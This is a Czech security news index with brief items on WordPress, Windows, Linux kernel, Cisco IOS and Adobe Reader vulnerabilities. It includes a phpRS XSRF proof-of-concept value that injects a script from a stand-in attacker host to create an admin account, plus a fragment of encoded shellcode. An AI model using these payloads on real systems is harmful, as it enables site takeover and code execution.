Exploit
WordPress obsahuje závažnou chybu umožňující DoS
Před pár dny se objevila advisorka popisující závažnou bezpečnostní chybu v CMS WordPress umožňující utoč DoS útok na server a jeho následné vytížení a nedostupnost.
Zdroj:
phpRS 2.8.1a XSRF POC EXPLOIT
PHPRS 2.8.1A XSRF POC EXPLOIT
VULN: REGISTRATION (readers.php), INPUTS ‘rcelejmeno’ && ‘rmail’
VALUE: “-</td><script src=http://ev.il/xpl.js />”
AUTHOR: 4194
EXPLOIT_DESCRIPTION: creating new admin account
Exploit použitý k útoku na korporátní síť Googlu
UPDATE
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
Chyba zneužitelná od Windows NT 3.1 až po Windows 7 (Ring 0 Escalation Vulnerability)
Na Internetu se objevil exploit umožňující eskalaci oprávnění díky kódu, který je ve Windows od roku 1993.
Twitter pod útokem iránských hackerů
... na Twitter byly během včerejšího dne vedeny hackerské útoky, ke kterým se přihlásila skupina „Iranian Cyber Army“ (Íránská kyberarmáda).
Linux Kernel 2.x sock_sendpage()
A máme tu další lokální exploit pro Linux.
Linux 2.6.30+ Local Kernel Exploit 0day - disabling SELinux, AppArmor and LSM
jj asi bude Grsecurity dobrá volba :o)
Souhrn Cisco IOS zranitelností
Cisco vydalo souhrn osmi zranitelností v IOS software, ke kterým přidalo popis chyby a metodu prevence/opatchování.
Individual publication links are listed below:
Linux Kernel Local Privilege Escalation Exploit
Milen Rangelov, vystupující pod pseudonymem gat3way, zveřejnil exploit umožňující utočníkovi v Linuxu lokální navýšení práv. Zasažena jsou jádra ve verzi 2.6.29 a nižší.
Kritická chyba v Adobe Readeru se 'toulá' Internetem
Kritická chyba v Adobe Readeru umožňující na počítači oběti spustit libovolný JavaScriptový kód se síří Internetem. Zasaženy jsou verze 7.x a vyšší.








